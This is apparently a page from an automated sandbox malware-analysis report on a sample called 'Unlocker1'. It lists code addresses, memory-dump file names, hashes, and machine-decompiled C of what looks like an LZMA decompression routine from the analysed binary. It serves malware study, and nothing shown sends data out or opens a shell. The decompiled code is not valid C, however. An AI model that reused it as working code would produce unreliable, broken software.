                                                                                                                                                              0x00406607
                                                                                                                                                              0x00406611
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406614
                                                                                                                                                              0x004065e4
                                                                                                                                                              0x004065e7
                                                                                                                                                              0x004065eb
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669f
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066c4
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a4
                                                                                                                                                              0x004066a7
                                                                                                                                                              0x004066aa
                                                                                                                                                              0x004066b1
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040678c
                                                                                                                                                              0x0040678f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063c6
                                                                                                                                                              0x004063c8
                                                                                                                                                              0x004063cf
                                                                                                                                                              0x004063d0
                                                                                                                                                              0x004063d2
                                                                                                                                                              0x004063d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063e0
                                                                                                                                                              0x004063e3
                                                                                                                                                              0x004063e5
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e8
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063f2
                                                                                                                                                              0x004063f5
                                                                                                                                                              0x00406403
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066dc
                                                                                                                                                              0x004066e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066ec
                                                                                                                                                              0x00406824
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406824
                                                                                                                                                              0x004066f2
                                                                                                                                                              0x004066f5
                                                                                                                                                              0x004066f8
                                                                                                                                                              0x004066fc
                                                                                                                                                              0x004066ff
                                                                                                                                                              0x00406705
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x0040670a
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406714
                                                                                                                                                              0x00406774
                                                                                                                                                              0x00406777
                                                                                                                                                              0x0040677c
                                                                                                                                                              0x0040677d
                                                                                                                                                              0x0040677f
                                                                                                                                                              0x00406781
                                                                                                                                                              0x00406784
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406716
                                                                                                                                                              0x0040671c
                                                                                                                                                              0x0040671f
                                                                                                                                                              0x00406722
                                                                                                                                                              0x00406725
                                                                                                                                                              0x00406728
                                                                                                                                                              0x0040672b
                                                                                                                                                              0x0040672e
                                                                                                                                                              0x00406731
                                                                                                                                                              0x00406734
                                                                                                                                                              0x00406737
                                                                                                                                                              0x00406750
                                                                                                                                                              0x00406753
                                                                                                                                                              0x00406756
                                                                                                                                                              0x00406759
                                                                                                                                                              0x0040675d
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x00406760
                                                                                                                                                              0x00406763
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406741
                                                                                                                                                              0x00406746
                                                                                                                                                              0x00406748
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x00406766
                                                                                                                                                              0x0040676d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040640b
                                                                                                                                                              0x0040640e
                                                                                                                                                              0x00406444
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406577
                                                                                                                                                              0x00406577
                                                                                                                                                              0x0040657a
                                                                                                                                                              0x0040657c
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00406582
                                                                                                                                                              0x00406585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040658b
                                                                                                                                                              0x0040658f
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406410
                                                                                                                                                              0x00406412
                                                                                                                                                              0x00406414
                                                                                                                                                              0x00406416
                                                                                                                                                              0x00406419
                                                                                                                                                              0x0040641a
                                                                                                                                                              0x0040641c
                                                                                                                                                              0x0040641e
                                                                                                                                                              0x00406421
                                                                                                                                                              0x00406424
                                                                                                                                                              0x0040643a
                                                                                                                                                              0x0040643f
                                                                                                                                                              0x00406477
                                                                                                                                                              0x00406477
                                                                                                                                                              0x0040647b
                                                                                                                                                              0x004064a7
                                                                                                                                                              0x004064a9
                                                                                                                                                              0x004064b0
                                                                                                                                                              0x004064b3
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bd
                                                                                                                                                              0x004064c0
                                                                                                                                                              0x004064c7
                                                                                                                                                              0x004064ca
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064fa
                                                                                                                                                              0x004064fd
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406571
                                                                                                                                                              0x004064ff
                                                                                                                                                              0x00406505
                                                                                                                                                              0x00406508
                                                                                                                                                              0x0040650b
                                                                                                                                                              0x0040650e
                                                                                                                                                              0x00406511
                                                                                                                                                              0x00406514
                                                                                                                                                              0x00406517
                                                                                                                                                              0x0040651a
                                                                                                                                                              0x0040651d
                                                                                                                                                              0x00406520
                                                                                                                                                              0x00406539
                                                                                                                                                              0x0040653b
                                                                                                                                                              0x0040653e
                                                                                                                                                              0x0040653f
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406318
                                                                                                                                                              0x00406318
                                                                                                                                                              0x0040631c
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x0040682e
                                                                                                                                                              0x00406834
                                                                                                                                                              0x00406836
                                                                                                                                                              0x0040683d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                                                                                              • Instruction ID: 0ba87498709856dc17a0c5f751d6ecfe3ae25d7b1153355424f504aba8ac83cf
                                                                                                                                                              • Opcode Fuzzy Hash: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                                                                                              • Instruction Fuzzy Hash: B4817772D04229CBDF24CFA8C8447AEBBB0FB44305F25816AD856BB2C0D7785A86DF44
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00406247 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00406247() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M0040684B))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
